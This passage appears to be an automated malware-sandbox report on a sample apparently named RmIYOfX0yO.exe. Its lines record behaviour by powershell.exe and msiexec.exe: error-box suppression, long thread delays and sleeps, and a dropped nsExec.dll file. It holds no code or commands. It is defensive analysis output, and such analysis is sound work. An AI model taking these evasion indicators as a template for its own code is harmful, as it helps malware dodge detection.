      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599766Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599625Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599510Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599404Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599297Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599185Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599078Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598969Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598860Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598735Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598610Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598486Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598360Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598235Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598110Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597985Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597844Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597719Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597606Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597497Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597391Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597282Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597157Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597032Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596921Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596808Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596703Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596594Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596485Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596360Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596235Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596110Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595985Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595860Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595735Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595610Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595485Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595360Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595235Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595110Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594985Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594860Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594735Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594610Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594485Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594360Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594235Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594110Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593985Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6676Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3026Jump to behavior
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsp7359.tmp\nsExec.dllJump to dropped file
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7612Thread sleep time: -7378697629483816s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -26747778906878833s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -600000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep count: 2627 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -599766s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -599625s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -599510s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep count: 7195 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -599404s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -599297s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -599185s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -599078s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -598969s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -598860s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -598735s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -598610s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -598486s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -598360s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -598235s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -598110s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -597985s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -597844s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -597719s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -597606s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -597497s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -597391s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -597282s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -597157s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -597032s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -596921s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -596808s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -596703s >= -30000sJump to behavior
